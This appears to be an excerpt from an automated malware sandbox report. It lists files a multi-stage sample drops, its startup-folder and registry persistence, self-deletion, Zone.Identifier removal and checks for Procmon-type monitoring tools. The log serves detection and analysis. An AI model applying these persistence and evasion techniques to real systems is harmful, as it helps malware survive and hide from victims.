Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_tta.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-2OL25.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-83LM2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-AEA87.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-EHRNN.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-OJELM.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Users\user\AppData\Local\Temp\is-UVLAE.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\syncUpd[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\ff_helper.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\srvwauv	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\dstt.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-0KP4B.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libsoxr.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-T6JUK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\780F.exe	File created: C:\Users\user\AppData\Local\Temp\tuc4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	File created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\basscd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-JVPL3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\rg_ebur128.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\OptimFROG.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-N2733.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-UMGQV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-N08BV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\utils.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Users\user\AppData\Local\Temp\is-UVLAE.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\is-4GFMI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\basswma.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	File created: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\is-V9NBJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-UJ6TD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassdsd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\sd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmidi.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\da.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-02A0E.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libdtsdec.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\basswv.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-R8UBV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libFLAC_dynamic.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\opusenc.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\7z.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-E8AR2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-9QGCC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-DS3J7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-458PU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libwebp.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\daiso.dll (copy)	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\33A6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Windows\servicing\Editions\RTFCtrl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Users\user\AppData\Local\Temp\is-UVLAE.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_ofr.dll (copy)	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\ProgramData\xQfUeydaBrjuHptx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-L31R1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	File created: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_fx.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MHVNS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-058DS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmix.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Program Files (x86)\ClocX\uninst.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassape.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2.dll (copy)	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\780F.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-2P3N7.tmp	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\4854.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\780F.exe	File created: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\88D9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TLO0A.tmp	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\928F.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_aac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\gain_analysis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	File created: C:\Users\user\AppData\Local\Temp\Costura\1485B29524EF63EB83DF771D39CCA767\64\sqlite.interop.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-G5GT1.tmp	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F38F.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\pcm2dsd.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Program Files (x86)\ClocX\ClocX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	File created: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\mp3gain.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\wavpackdll.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-FD1T9.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-RFBIV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\is-CUH2H.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\d_writer.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-HBK1Q.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe	File created: C:\ProgramData\Bytematrix74\Bytematrix74.exe	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\ProgramData\xQfUeydaBrjuHptx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\etopt.exe

File created: C:\Windows\servicing\Editions\RTFCtrl.dll

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\srvwauv			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hivwauv			Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3Ex NULL
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3Ex NULL
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx NULL
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx NULL

Drops PE files to the startup folder

Source: C:\Users\user\AppData\Local\Temp\CFAA.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe

Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Window searched: window name: RegmonClass

Source: C:\Users\user\AppData\Local\Temp\CFAA.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe

Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ClocX
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ClocX\ClocX.lnk
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ClocX\Uninstall.lnk
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe

Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service Scheduler
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service Scheduler

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\uvqld8yvk6.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\srvwauv:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\hivwauv:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	23_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	23_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_004241EC IsIconic,SetActiveWindow,SetFocus,	23_2_004241EC
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_004241A4 IsIconic,SetActiveWindow,	23_2_004241A4
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	23_2_00418394
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	23_2_0042286C
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_004175A8 IsIconic,GetCapture,	23_2_004175A8
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00417CDE IsIconic,SetWindowPos,	23_2_00417CDE
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	23_2_00417CE0
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00481E2C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,	23_2_00481E2C

Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp

Code function: 23_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

23_2_0044AEAC

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
